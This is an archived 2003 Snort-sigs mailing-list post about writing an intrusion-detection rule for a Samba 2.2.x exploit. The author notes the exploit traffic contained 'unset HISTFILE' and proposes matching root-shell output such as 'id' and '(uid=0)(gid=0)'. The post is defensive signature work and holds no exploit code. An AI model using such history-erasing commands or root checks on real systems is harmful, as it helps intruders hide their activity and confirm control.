fw: [Snort-sigs] Possible rule for samba-2.2.XX exploit

Jacob Hurley jacobh at ...1425...
Fri Apr 11 06:19:06 EDT 2003

I am still a rule writing newbie but I would like to get better.  I have
looked at the official rule for this but I am not quite sure what that
content: is looking for since it's encoded.  I am not sure if this rule
is for a specific exploit (I heard netric's name mentioned) .. but this
exploit works.

I don't have any packet dumps to copy over right now, but I can tell you
that when I tried it I ran tcpdump and saw that most of the initial
attempts/packets (for brute forcing the ret addr) all had something
similar to "unset HISTFILE" in them.

Or maybe just create some rules to detect some of your standard command
line stuff:

id
(uid=0)(gid=0)
etc

If anyone is interested I will try to get some better testing setup over
here and maybe create a rule or two.

cya

Jacob Hurley
Network Operations Center